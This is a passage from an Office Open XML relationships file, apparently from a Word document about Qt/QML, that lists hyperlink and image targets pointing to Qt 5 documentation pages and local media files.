Target="http://doc.qt.io/qt-5/qml-qtquick-pathview.html" TargetMode="External"/><Relationship Id="rId2760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-uicomponents-tabwidget.html" TargetMode="External"/><Relationship Id="rId2998" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/topics-network-connectivity.html" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-uses-layouts-positioners.png" TargetMode="External"/><Relationship Id="rId732" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-applicationwindow.html" TargetMode="External"/><Relationship Id="rId1155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathsvg.html" TargetMode="External"/><Relationship Id="rId1362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2413" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffect.html" TargetMode="External"/><Relationship Id="rId2620" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId2858" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId1015" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-javascriptdialogrequest.html" TargetMode="External"/><Relationship Id="rId1222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-ratings.html" TargetMode="External"/><Relationship Id="rId1667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1874" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-affector.html" TargetMode="External"/><Relationship Id="rId2718" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId2925" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId1734" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-columnlayout.html" TargetMode="External"/><Relationship Id="rId1941" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId1801" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-filedialog.html" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtgui-index.html" TargetMode="External"/><Relationship Id="rId687" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlbasictypes.html" TargetMode="External"/><Relationship Id="rId2063" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtexture.html" TargetMode="External"/><Relationship Id="rId2270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-row.png" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId894" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-dispatchcompute.html" TargetMode="External"/><Relationship Id="rId1177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-planemesh.html" TargetMode="External"/><Relationship Id="rId2130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId2782" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-repeater.html" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtquickcontrols/qtquickcontrols-overview.html" TargetMode="External"/><Relationship Id="rId754" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-barset.html" TargetMode="External"/><Relationship Id="rId961" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-graphicsapifilter.html" TargetMode="External"/><Relationship Id="rId1384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-togglebutton.html" TargetMode="External"/><Relationship Id="rId1591" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-parentchange.html" TargetMode="External"/><Relationship Id="rId2642" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-delegatemodel.html" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qeventloop.html" TargetMode="External"/><Relationship Id="rId821" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-checkbox.html" TargetMode="External"/><Relationship Id="rId1037" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-layer.html" TargetMode="External"/><Relationship Id="rId1244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-rotationreading.html" TargetMode="External"/><Relationship Id="rId1451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webenginedownloaditem.html" TargetMode="External"/><Relationship Id="rId1896" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-springanimation.html" TargetMode="External"/><Relationship Id="rId2947" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId919" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-fastblur.html" TargetMode="External"/><Relationship Id="rId1104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-mouseevent.html" TargetMode="External"/><Relationship Id="rId1311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-stackedbarseries.html" TargetMode="External"/><Relationship Id="rId1549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qdate.html" TargetMode="External"/><Relationship Id="rId1756" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId1963" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qtquicktest.html" TargetMode="External"/><Relationship Id="rId2807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId1409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-treeview.html" TargetMode="External"/><Relationship Id="rId1616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId1823" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-effects-particles.html" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-basics.html" TargetMode="External"/><Relationship Id="rId2085" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qimage.html" TargetMode="External"/><Relationship Id="rId2292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-coordinates.html" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplematerialshader.html" TargetMode="External"/><Relationship Id="rId2597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-repeater.html" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-real.html" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-index.html" TargetMode="External"/><Relationship Id="rId776" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-buttonaxisinput.html" TargetMode="External"/><Relationship Id="rId983" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-horizontalbarseries.html" TargetMode="External"/><Relationship Id="rId1199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyaction.html" TargetMode="External"/><Relationship Id="rId2457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-coloranimation.html" TargetMode="External"/><Relationship Id="rId2664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId636" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qvariant.html" TargetMode="External"/><Relationship Id="rId1059" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-logvalueaxis.html" TargetMode="External"/><Relationship Id="rId1266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-scrollindicator.html" TargetMode="External"/><Relationship Id="rId1473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xanimator.html" TargetMode="External"/><Relationship Id="rId2012" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt.html" TargetMode="External"/><Relationship Id="rId2317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/edge4.png" TargetMode="External"/><Relationship Id="rId2871" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2969" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-overview.html" TargetMode="External"/><Relationship Id="rId843" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-comboboxstyle.html" TargetMode="External"/><Relationship Id="rId1126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-opacityanimator.html" TargetMode="External"/><Relationship Id="rId1680" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1778" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1985" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sprite.html" TargetMode="External"/><Relationship Id="rId2731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId2829" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgbasicgeometrynode.html" TargetMode="External"/><Relationship Id="rId703" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-abstractseries.html" TargetMode="External"/><Relationship Id="rId910" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-emitter.html" TargetMode="External"/><Relationship Id="rId1333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-string.html" TargetMode="External"/><Relationship Id="rId1540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId1400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-traceinputarea.html" TargetMode="External"/><Relationship Id="rId1845" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-system-example.html" TargetMode="External"/><Relationship Id="rId1705" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1912" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-identifiedmodules.html" TargetMode="External"/><Relationship Id="rId493" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-animations.html" TargetMode="External"/><Relationship Id="rId2174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId3018" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-debugging-qml.html" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-scope.html" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId798" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3dabstractobject.html" TargetMode="External"/><Relationship Id="rId1190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtpositioning-position.html" TargetMode="External"/><Relationship Id="rId2034" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickpainteditem.html" TargetMode="External"/><Relationship Id="rId2241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyanimation.html" TargetMode="External"/><Relationship Id="rId2686" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2893" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-interactqmlfromcpp.html" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-qmlmodule.html" TargetMode="External"/><Relationship Id="rId865" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-cumulativedirection.html" TargetMode="External"/><Relationship Id="rId1050" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-list.html" TargetMode="External"/><Relationship Id="rId1288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-size.html" TargetMode="External"/><Relationship Id="rId1495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visualize-overdraw-1.png" TargetMode="External"/><Relationship Id="rId2339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchorchanges.html" TargetMode="External"/><Relationship Id="rId2546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2960" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-usecase-visual.html" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId725" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-angledirection.html" TargetMode="External"/><Relationship Id="rId932" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-folderlistmodel-folderlistmodel.html" TargetMode="External"/><Relationship Id="rId1148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathcubic.html" TargetMode="External"/><Relationship Id="rId1355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-tabviewstyle.html" TargetMode="External"/><Relationship Id="rId1562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId2406" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-scaleanimator.html" TargetMode="External"/><Relationship Id="rId2613" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qlist.html" TargetMode="External"/><Relationship Id="rId1008" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-itemdelegate.html" TargetMode="External"/><Relationship Id="rId1215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-radio.html" TargetMode="External"/><Relationship Id="rId1422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-var.html" TargetMode="External"/><Relationship Id="rId1867" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-friction.html" TargetMode="External"/><Relationship Id="rId2820" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry-attributeset.html" TargetMode="External"/><Relationship Id="rId2918" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1934" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listmodel.html" TargetMode="External"/><Relationship Id="rId2196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-input-mouseevents.html" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qwindow.html" TargetMode="External"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlepainter.html" TargetMode="External"/><Relationship Id="rId2056" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId2263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2470" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId887" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-dialogbuttonbox.html" TargetMode="External"/><Relationship Id="rId1072" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-maproute.html" TargetMode="External"/><Relationship Id="rId2123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship 